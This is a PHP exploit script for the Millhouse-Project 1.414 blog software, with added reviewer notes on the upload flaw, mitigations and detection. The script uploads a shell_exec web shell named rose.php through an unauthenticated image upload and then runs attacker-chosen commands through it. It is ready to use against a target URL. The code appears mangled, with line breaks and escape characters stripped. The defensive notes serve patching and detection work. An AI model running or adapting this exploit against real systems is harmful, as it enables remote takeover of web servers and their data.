Millhouse-Project 1.414 Shell Upload

<?php/*
Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A

Reviewer notes (defensive reading of this listing)

Weakness shown: the script sends a multipart POST to /includes/add_post_sql.php
whose "image" part is named rose.php with Content-Type application/x-php, and then
requests /images/rose.php. That implies the upload handler keeps the client-supplied
file name and extension and writes the file into a web-served directory where the
server executes it as PHP (unrestricted upload of a dangerous file type, CWE-434).

Authentication: the only credential sent is the literal header
"Cookie: PHPSESSID=rose1337". Presumably the handler does not check for a valid
logged-in session; confirm against the application source.

State of this listing: the page extraction dropped line breaks, the CRLF separators
of the multipart body and the backslashes of escape sequences (the "33[1;32m" and
" n" runs in the strings were terminal colour codes and newlines). The code below is
kept byte-for-byte as published and is not repaired here.

Mitigation for maintainers and operators:
- require an authenticated, authorised session before the upload handler does any work;
- accept images only by an allow-list of extensions and verify the decoded content,
  never the client-supplied Content-Type or file name;
- store uploads under a server-generated name, outside the document root, or disable
  script execution for the images directory in the web server configuration.

Detection:
- access logs: POST requests to /includes/add_post_sql.php followed by requests for
  a .php resource under /images/ (this listing uses rose.php with a cmd query string);
- file integrity: any .php file appearing in the images directory;
- host telemetry: the web server account spawning a shell or other child processes.
*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("33[1;32m n Millhouse Remote Code Execution n Author: Chokri Hammedin n Usage : php exploit.php -u http://target.org/ -c whoaminn33[0mnn");$target = $options['u'];$command = $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array('Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8','Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "33[1;32m n".$exec_shell . "33[0mn n";?>

Source: cxsecurity.com/issue/WLB-2023050039
